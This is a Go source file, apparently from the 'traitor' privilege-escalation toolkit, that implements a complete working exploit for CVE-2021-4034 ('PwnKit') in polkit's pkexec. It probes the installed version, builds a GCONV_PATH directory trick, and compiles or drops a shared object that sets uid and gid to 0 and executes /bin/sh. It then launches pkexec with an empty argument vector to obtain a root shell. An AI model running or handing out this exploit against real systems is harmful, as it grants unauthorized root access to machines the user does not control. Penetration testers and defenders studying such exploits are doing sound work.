package cve20214034

import (
	"context"
	"fmt"
	"io/ioutil"
	"os"
	"os/exec"
	"path/filepath"
	"strconv"
	"strings"

	"github.com/google/uuid"
	"github.com/liamg/traitor/pkg/logger"
	"github.com/liamg/traitor/pkg/payloads"
	"github.com/liamg/traitor/pkg/state"
)

// cve20214034Exploit implements the pkexec local privilege escalation
// tracked as CVE-2021-4034 ("PwnKit").
//
// see:
// - https://blog.qualys.com/vulnerabilities-threat-research/2022/01/25/pwnkit-local-privilege-escalation-vulnerability-discovered-in-polkits-pkexec-cve-2021-4034
// - https://seclists.org/oss-sec/2022/q1/80
type cve20214034Exploit struct {
	// uuid is a random identifier assigned by New. No method visible in this
	// file reads it; presumably it is used elsewhere — TODO confirm.
	uuid string
}

// New returns an exploit instance tagged with a freshly generated UUID.
func New() *cve20214034Exploit {
	return &cve20214034Exploit{uuid: uuid.NewString()}
}

// IsVulnerable reports whether the local pkexec appears to be exploitable.
//
// pkexec must be on PATH, and `pkexec --version` must report a 0.x release
// whose minor version is at most 105. The result is then confirmed by running
// Exploit with the harmless "true" payload, with logging silenced. Any failure
// along the way yields false.
func (v *cve20214034Exploit) IsVulnerable(ctx context.Context, s *state.State, log logger.Logger) bool {
	if _, err := exec.LookPath("pkexec"); err != nil {
		return false
	}

	data, err := exec.Command("pkexec", "--version").Output()
	if err != nil {
		return false
	}

	minor, ok := parsePkexecMinorVersion(string(data))
	if !ok || minor > 105 {
		return false
	}

	if err := v.Exploit(ctx, s, log.Silenced(), payloads.Payload("true")); err != nil {
		return false
	}

	log.Printf("Polkit version is vulnerable!")
	return true
}

// parsePkexecMinorVersion extracts the minor component of a polkit 0.x
// version from `pkexec --version` output (e.g. "pkexec version 0.105\n" -> 105).
//
// The last whitespace-separated field is used. strings.Fields also strips the
// trailing newline, which would otherwise make strconv.Atoi fail. A
// distribution suffix such as "0.105-26" is ignored. ok is false when the
// output is empty, the major version is not "0", there is no minor component,
// or the minor component is not numeric.
func parsePkexecMinorVersion(output string) (minor int, ok bool) {
	fields := strings.Fields(output)
	if len(fields) == 0 {
		return 0, false
	}

	versionBits := strings.Split(fields[len(fields)-1], ".")
	if len(versionBits) < 2 || versionBits[0] != "0" {
		return 0, false
	}

	n, err := strconv.Atoi(strings.Split(versionBits[1], "-")[0])
	if err != nil {
		return 0, false
	}
	return n, true
}

// Shell runs Exploit with payloads.Default and returns whatever error it
// produces.
func (v *cve20214034Exploit) Shell(ctx context.Context, s *state.State, log logger.Logger) error {
	payload := payloads.Default
	return v.Exploit(ctx, s, log, payload)
}

// writeSharedObject writes to path the shared object that pkexec is made to
// load.
//
// When aggro is true the object executes /bin/sh; otherwise it executes
// /usr/bin/true. If a C compiler ("cc") is on PATH, the object is compiled
// from the embedded C source. Otherwise the matching precompiled object
// (pwnkit_sh_sharedobj or pwnkit_true_sharedobj, defined elsewhere in the
// package) is written with mode 0755.
//
// The C source goes to a uniquely named temporary file rather than a fixed
// name, so concurrent runs cannot clobber each other. os.CreateTemp also
// refuses to reuse an existing file or symlink. Compiler output is included in
// the returned error so build failures can be diagnosed.
func (v *cve20214034Exploit) writeSharedObject(path string, aggro bool, log logger.Logger) error {

	var command string
	var so []byte
	if aggro {
		so = pwnkit_sh_sharedobj
		command = "/bin/sh"
	} else {
		so = pwnkit_true_sharedobj
		command = "/usr/bin/true"
	}

	if _, err := exec.LookPath("cc"); err != nil {
		log.Printf("C compiler not available, using precompiled shared object...")
		return ioutil.WriteFile(path, so, 0755)
	}

	src := fmt.Sprintf(`#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

void gconv(void) {}

void gconv_init(void *step) {
  char *const args[] = {"%s", NULL};
  char *const environ[] = {"PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/"
                           "bin:/sbin:/bin:/opt/bin",
                           NULL};
  setuid(0);
  setgid(0);
  execve(args[0], args, environ);
  exit(0);
}
`, command)

	log.Printf("Compiling shared object...")
	// The ".c" suffix must survive so that cc treats the file as C source.
	srcFile, err := os.CreateTemp(os.TempDir(), "traitor-*.c")
	if err != nil {
		return fmt.Errorf("failed to create shared object source file: %w", err)
	}
	srcPath := srcFile.Name()
	defer func() {
		// Best-effort cleanup; a leftover source file is harmless.
		_ = os.Remove(srcPath)
	}()
	if _, err := srcFile.WriteString(src); err != nil {
		_ = srcFile.Close()
		return fmt.Errorf("failed to write shared object source: %w", err)
	}
	if err := srcFile.Close(); err != nil {
		return fmt.Errorf("failed to write shared object source: %w", err)
	}

	out, err := exec.Command("cc", "-Wall", "-shared", "-fPIC", "-o", path, srcPath).CombinedOutput()
	if err != nil {
		return fmt.Errorf("failed to compile shared object: %w: %s", err, strings.TrimSpace(string(out)))
	}
	return nil
}

// Exploit runs pkexec with an empty argument vector and a crafted environment
// from inside a temporary working directory (CVE-2021-4034).
//
// Supported payloads:
//   - payloads.Default and payloads.Defer spawn /bin/sh.
//   - payloads.Payload("true") runs /usr/bin/true. IsVulnerable uses this as a
//     non-invasive probe.
//
// Any other payload is rejected before anything is written to disk. The
// temporary directory is removed when Exploit returns. The child process
// inherits this process's stdin, stdout and stderr.
//
// NOTE(review): the returned error covers setup, process start and wait
// failures only. os.Process.Wait does not report a non-zero exit status as an
// error, so a pkexec run that exits with failure still returns nil here —
// confirm whether IsVulnerable should inspect the ProcessState instead.
func (v *cve20214034Exploit) Exploit(ctx context.Context, s *state.State, log logger.Logger, payload payloads.Payload) error {
	// Validate the payload first so an unsupported request leaves no files behind.
	var aggressive bool
	switch payload {
	case payloads.Default, payloads.Defer:
		aggressive = true
	case payloads.Payload("true"):
	default:
		return fmt.Errorf("custom payloads are not supported for this exploit")
	}

	log.Printf("Setting up filesystem tree...")
	dir, err := os.MkdirTemp(os.TempDir(), "traitor")
	if err != nil {
		return fmt.Errorf("could not create temp dir: %w", err)
	}
	defer func() {
		// Best-effort cleanup of the whole working tree.
		_ = os.RemoveAll(dir)
	}()

	if err := os.MkdirAll(filepath.Join(dir, "GCONV_PATH=."), 0777); err != nil {
		return fmt.Errorf("could not create exploit dir: %w", err)
	}

	if err := ioutil.WriteFile(filepath.Join(dir, "GCONV_PATH=.", "hax.so:."), []byte(";)"), 0777); err != nil {
		return fmt.Errorf("failed to create fake executable: %w", err)
	}

	// The environment layout below is exactly what the exploit depends on; do
	// not reorder or "clean up" these entries.
	procAttr := &os.ProcAttr{
		Dir: dir,
		Env: []string{
			"hax.so:.",
			"PATH=GCONV_PATH=.",
			"SHELL=/no/where",
			"CHARSET=HAX",
			"GIO_USE_VFS=",
		},
		Files: []*os.File{
			os.Stdin,
			os.Stdout,
			os.Stderr,
		},
	}

	if err := v.writeSharedObject(filepath.Join(dir, "hax.so"), aggressive, log); err != nil {
		return fmt.Errorf("failed to write shared object: %w", err)
	}

	log.Printf("Writing local gconv-modules...")
	if err := ioutil.WriteFile(filepath.Join(dir, "gconv-modules"), []byte("module UTF-8// HAX// hax 1\n"), 0644); err != nil {
		return fmt.Errorf("failed to write gconv-modules: %w", err)
	}

	pkexecPath, err := exec.LookPath("pkexec")
	if err != nil {
		return fmt.Errorf("could not find pkexec: %w", err)
	}
	log.Printf("Starting %s with malicious environment variables set...", pkexecPath)
	// argv is deliberately nil (argc == 0); the vulnerability depends on it.
	process, err := os.StartProcess(pkexecPath, nil, procAttr)
	if err != nil {
		return fmt.Errorf("failed to start pkexec: %w", err)
	}
	_, err = process.Wait()
	return err
}
